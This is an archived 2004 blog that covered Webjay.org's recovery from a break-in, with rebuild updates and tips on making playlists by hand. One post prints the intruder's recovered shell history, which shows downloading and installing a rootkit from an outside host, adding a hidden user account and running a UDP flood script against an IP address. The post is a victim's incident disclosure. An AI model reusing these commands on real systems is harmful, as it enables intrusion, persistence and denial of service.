Tuesday, December 07, 2004

 

Afterlife of this blog

You are reading a defunct weblog. This weblog was created to stand in for the Webjay.org web site when it was totalled by a cracker. During that time the webjay.org domain forwarded to here, where users could get news about progress towards reopening the site.

But no longer.

If you are reading this, you must not have gone through the forwarding address. In that case, there is no here here.

Monday, December 06, 2004

 

BACK FROM THE DEAD -jay


We're flipping the switch to put Webjay back online. It will take about a half day for the change to reach every ISP, so if you see this page instead of webjay.org, stop back in a little while.

In the meantime, let's celebrate:





Friday, December 03, 2004

 

Re-opening Monday

The code is good to go, so the next thing is a couple days worth of security work.

Grand re-opening date: Monday.

 

Starfrosch playlist

Markus Koller's hand-made M3U (hosted on gonze.com/playlists per my offer the other day) is rocking my apartment block. Markus, my neighbors are cursing you as I write this.

Doing it by hand is primitive but fun. Any more?

Update #1: Brett, aka webjaybs, posted more handmade playlists here:


Update #2: Actually, there's no need to email me the list of song URLs. Just post them in a comment and I'll make an M3U.

Thursday, December 02, 2004

 

Testers wanted

Almost everything is now running, and the bugs are getting smaller and smaller, so it's time to bring in more eyeballs. There are two criteria for people who want to do testing:

1) You have to be technical enough to convince your machine that webjay.org is on the IP address I will give you. On a Unix box this means editing /etc/hosts, on a Mac it means using NetInfo, on a Windows machine it means something I don't know.

2) You have to be known to me already, since the new layer of security isn't ready yet.

Send an email to lucas@gonze.com. (webjay.org email isn't up yet.)

 

Kewl

Forums are up.

Wednesday, December 01, 2004

 

Rosie the 'lister says...

Courtesy P. Harper: 'we can rebuild it' mod of classic Rosie the Riveter image



Lemme tell you, I'm cursing like a sailor while I work on the rebuild. Anyway, if you're really jonesing there is a thing you can do. Back before webjay bootstrapped, Brett, Jim and myself were making playlists manually. What you do is make a file entitled playlistname.m3u with a bunch of URLs of songs in it, then put the file in a directory which is set up with the right mime types. gonze.com/playlists was set up for this, and it still is, so if you email me a .m3u file I'll copy it over there and post a pointer here.

For historical interest, the first really good playlist was Work, which you can still see (and maybe even listen to).


 

Knock knock

Our friend from Brazil came knocking again. In the log of denied IP
addresses we have these:

200.175.27.55.dialup.gvt.net.br

201-1-138-30.dsl.telesp.net.br


What a creepy experience. It's like hearing noises in the night and
knowing for a fact that it's a burglar.



Tuesday, November 30, 2004

 

Status November 30

The last backed-up version is now running on the new server and I'm in the process of merging in the freshest data and code. All together, the new version is up but in a very buggy state.

Monday, November 29, 2004

 

Cracker footsteps

Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.


cd /dev
history
wget http://www.cascorosso.com/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
w
ls
exit
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
exit
id
wget perl udp.pl 200.103.191.2 29 2000
wget www.packetstormsecurity.org/DoS/udp.pl
perl udp.pl 200.103.191.2 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
ls
cd vhosts/
ls
pwd
less kaotic.pl
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages


Notice that kaotic.pl file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.

 

Prognosis

The database looks fine, so playlists and user accounts should be in good shape.

There are two backups of the code, a fairly old one which holds everything and a fresh one which holds only a few critical modules. These two different snapshots will have to be knitted together, which means that bugs will crop up during the first 1-2 days back up. Also, bugs fixed in the older backup will have to be refound and refixed.

My guess for how long the work will take is a few days at the least, a week at the most.


This page is powered by Blogger. Isn't yours?